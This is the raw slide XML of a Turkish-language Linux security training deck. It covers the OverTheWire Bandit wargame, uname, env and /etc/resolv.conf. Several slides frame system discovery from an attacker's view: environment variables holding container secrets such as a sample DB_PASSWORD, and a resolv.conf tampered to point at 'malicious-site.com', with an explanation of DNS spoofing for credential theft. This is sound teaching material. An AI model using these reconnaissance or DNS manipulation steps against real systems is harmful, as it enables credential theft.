                </a:hlinkClick>
              </a:rPr>
              <a:t>bandit0@bandit.labs.overthewire.org</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> -p 2220</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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17" name="Shape 417"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="Google Shape;418;p5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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Bandit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Over</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> the war game CTF tamamla</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="Google Shape;419;p54"/>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b="1" lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> $ ssh </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>bandit0@bandit.labs.overthewire.org</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> -p 2220</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="Google Shape;420;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171350" y="1245950"/>
            <a:ext cx="8730900" cy="3323100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3436"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="182875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Linux Temel Komutlar CTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” uygulama dokümanında istenen görevleri yerine getiren linux komutlarını yazın.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="421" name="Google Shape;421;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="767721" y="2393857"/>
            <a:ext cx="2393600" cy="8693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060F"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="426" name="Shape 426"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427" name="Google Shape;427;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2445600" y="2354550"/>
            <a:ext cx="6330300" cy="434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3400"/>
              <a:t>Kritik dosyalar</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="428" name="Google Shape;428;p55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="2181"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675775"/>
            <a:ext cx="2392300" cy="400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 name="Shape 57"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Google Shape;58;p1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İşletim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sistemlerinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> atası: Timesharing System</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="[Recorded: May 9, 1963] &#10;This vintage film features MIT Science Reporter John Fitch at the MIT Computation Center in an extended interview with MIT professor of computer science Fernando J. Corbato. The film was co-produced by WGBH (Boston) and MIT.  &#10; &#10;The prime focus of the film is timesharing, one of the most important developments in computing, and one which has come in and out of favor several times over the last several decades as the dichotomy between remote and centrally-managed computing resources played out; the latest incarnation for centrally-managed computing resources is known as cloud computing.  &#10; &#10;Timesharing as shown in this film, was a novel concept in the early 1960s. Driven by a desire to more efficiently use expensive computer resources while increasing the interactivity between user and computer (man and machine), timesharing was eventually taken up by industry in the form of special timesharing hardware for mainframe and minicomputer computer systems as well as in sophisticated operating systems to manage multiple users and resources. &#10; &#10;Corbato describes how after the mid-1950s, when computers began to become reliable, the next big challenge to improve productivity and efficiency was the development of computer languages, FORTRAN being an example. One of the next bottlenecks in computing, according to Corabto, was the traditional batch processing method of combining many peoples computer jobs into one large single job for the computer to process at one time. He compares batch processing to a group of people catching a bus, all being moved at once. &#10; &#10;Timesharing, on the other hand, involves attaching a large number of consoles to the central computer, each of which is given a time-slice of the computers time. While the computer is rapidly switching among user applications and problems, it appears to the user that s/he has complete access to the central computer. &#10; &#10;Corbato then describes in technical detail a complex description of timesharing before showing some examples of timesharing from a terminal using a simple program to calculate a simple geometric problem (Pythagorean theorem). &#10; &#10;In the long run, Corbato says, timesharing will help address the increasing need for computer time and ease-of-use." id="59" name="Google Shape;59;p11" title="1963 Timesharing: A Solution to Computer Bottlenecks">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="300200" y="1022850"/>
            <a:ext cx="5507175" cy="3097800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Google Shape;60;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5870750" y="1022850"/>
            <a:ext cx="3157200" cy="3147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US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Birden fazla kullanıcının aynı anda işlem yapabilme yeteneği.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İşlemcinin işler arasında paylaştırılması.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İşlemci ve bellek yönetimi</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Google Shape;61;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4831050"/>
            <a:ext cx="9144000" cy="3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solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Video : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=Q07PhW5sCEk</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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32" name="Shape 432"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="Google Shape;433;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="0"/>
            <a:ext cx="87501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İşletim sistemi ve donanım bilgilerini öğrenme: uname -a</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Google Shape;434;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1217400"/>
            <a:ext cx="4115400" cy="3496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0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Linux myhostname </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>4.15</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>88</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>-generic</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> #88-Ubuntu SMP Tue Feb 11 20:11:34 UTC 2020 x86_64 GNU/Linux</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="999999"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="999999"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="Google Shape;435;p5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uname -a</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Google Shape;436;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4413650" y="679925"/>
            <a:ext cx="4488600" cy="40344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İşletim sistemi ve donanım bilgilerini gösteren komuttur.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çıktıda:</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Linux: İşletim sistemi adı</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myhostname: Host adı</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4.15.0-88-generic: Çekirdek sürümü</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#88-Ubuntu SMP Tue Feb 11 20:11:34 UTC 2020: Derleme tarihi ve saat</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x86_64: Mimari (64-bit)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="9144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GNU/Linux: İşletim sistemi tipi</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0" name="Shape 440"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441" name="Google Shape;441;p5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 de yer alan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>environment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> değişkenleri keşfetme</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="442" name="Google Shape;442;p57"/>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USER=your_username</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HOME=/home/your_username</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LANGUAGE=en_US</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TERM=xterm</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SHELL=/bin/bash</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DB_HOST=my-postgres-container</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DB_PORT=5432</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DB_NAME=mydatabase</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DB_USER=myuser</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DB_PASSWORD=mypassword</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Google Shape;443;p57"/>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a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ env</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="Google Shape;444;p57"/>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komut sistemdeki çevresel değişkenleri verir.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Docker gibi </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>container larda</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> hassas bilgiler genelde </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>environment</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> değişkeni olarak tutulur.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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48" name="Shape 448"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="449" name="Google Shape;449;p5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 de yer alan DNS sunucuları keşfetme</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="Google Shape;450;p58"/>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 Generated by NetworkManager</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search malicious-site.com  #search example.com</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nameserver 192.168.1.2     #nameserver 8.8.8.8</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nameserver 192.168.1.3     #nameserver 8.8.4.4</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="Google Shape;451;p58"/>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/etc/resolv.conf</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="452" name="Google Shape;452;p58"/>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Dosya, sistemdeki DNS ayarlarını içerir ve NetworkManager tarafından otomatik oluşturulur.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Hacker, bu dosyayı manipüle ederek kullanıcıları kötü amaçlı sitelere yönlendirebilir ve kimlik bilgilerini çalabilir.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"DNS spoofing"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> saldırısıyla kullanıcıları sahte DNS sunucularına yönlendirerek erişim engeli oluşturabilir.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6" name="Shape 456"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457" name="Google Shape;457;p5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Dağıtım sürümlerini keşfetme</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
